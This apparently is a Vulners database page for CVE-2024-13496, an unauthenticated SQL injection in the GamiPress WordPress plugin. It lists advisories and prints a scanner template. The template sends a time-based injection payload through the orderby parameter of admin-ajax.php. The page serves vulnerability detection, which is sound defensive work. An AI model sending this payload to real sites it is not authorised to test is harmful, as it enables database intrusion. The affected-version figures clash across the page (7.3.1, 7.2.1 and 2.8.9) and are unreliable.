| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2024-13496 | 21 Jan 202523:07 | – | circl | |
| WordPress plugin GamiPress SQL注入漏洞 | 22 Jan 202500:00 | – | cnnvd | |
| CVE-2024-13496 | 22 Jan 202511:07 | – | cve | |
| CVE-2024-13496 GamiPress <= 7.3.1 - Unauthenticated SQL Injection via orderby Parameter | 22 Jan 202511:07 | – | cvelist | |
| CVE-2024-13496 | 22 Jan 202511:15 | – | nvd | |
| CVE-2024-13496 | 22 Jan 202511:15 | – | osv | |
| WordPress GamiPress plugin <= 7.2.1 - Unauthenticated SQL Injection via orderby Parameter vulnerability | 21 Jan 202522:53 | – | patchstack | |
| CVE-2024-13496 | 4 Feb 202523:57 | – | redhatcve | |
| CVE-2024-13496 GamiPress <= 7.3.1 - Unauthenticated SQL Injection via orderby Parameter | 22 Jan 202511:07 | – | vulnrichment | |
| Wordfence Intelligence Weekly WordPress Vulnerability Report (January 20, 2025 to January 26, 2025) | 30 Jan 202516:04 | – | wordfence |
| Source | Link |
|---|---|
| abrahack | www.abrahack.com/posts/gamipress-sqli/ |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2024-13496 |
id: CVE-2024-13496
info:
name: GamiPress <= 2.8.9 - SQL Injection
author: ritikchaddha
severity: high
description: |
GamiPress WordPress plugin version 2.8.9 and below suffers from an SQL injection vulnerability due to insufficient sanitization of user input, allowing attackers to execute arbitrary SQL commands.
impact: |
Unauthenticated attackers can execute arbitrary SQL commands to extract, modify, or delete database contents, potentially compromising the entire WordPress installation.
remediation: |
Update GamiPress plugin to version 2.8.10 or later.
reference:
- https://abrahack.com/posts/gamipress-sqli/
- https://nvd.nist.gov/vuln/detail/CVE-2024-13496
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-13496
cwe-id: CWE-89
epss-score: 0.02168
epss-percentile: 0.80064
metadata:
max-requests: 2
fofa-query: body="/wp-content/plugins/gamipress"
tags: cve,cve2024,wp,wordpress,gamipress,sqli,wp-plugin,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 30s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=WebKitFormBoundaryPzS34wz7rAyyJYSi
------WebKitFormBoundaryPzS34wz7rAyyJYSi
Content-Disposition: form-data; name="action"
gamipress_get_logs
------WebKitFormBoundaryPzS34wz7rAyyJYSi
Content-Disposition: form-data; name="nonce"
{{nonce}}
------WebKitFormBoundaryPzS34wz7rAyyJYSi
Content-Disposition: form-data; name="orderby"
(SELECT/**/sleep(8)/**/FROM/**/dual/**/WHERE/**/1/**/LIKE/**/1)#
------WebKitFormBoundaryPzS34wz7rAyyJYSi--
matchers:
- type: dsl
dsl:
- 'duration>= 8'
- 'status == 200'
- 'contains(headers, "application/json")'
- 'contains(body, "success\":true")'
condition: and
extractors:
- type: regex
part: body
name: nonce
group: 1
regex:
- '"nonce":"([0-9a-z]+)"'
internal: true
# digest: 4a0a00473045022041e197695f7cebdb3442932820c1003221a144c5c28e2e2329e503623514c598022100f6deabb86168e26ed450605120fdf05f8910d7a73b8e8a5649afa803af301c95:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation